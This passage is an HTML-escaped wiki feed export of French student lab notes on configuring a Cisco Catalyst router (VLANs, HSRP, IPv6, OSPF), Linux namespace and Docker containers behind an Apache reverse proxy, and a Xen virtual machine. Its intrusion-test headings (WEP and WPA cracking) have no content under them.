 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49087</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49087"/>
				<updated>2018-12-21T15:00:58Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.4 Le routage de site (IPv6) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
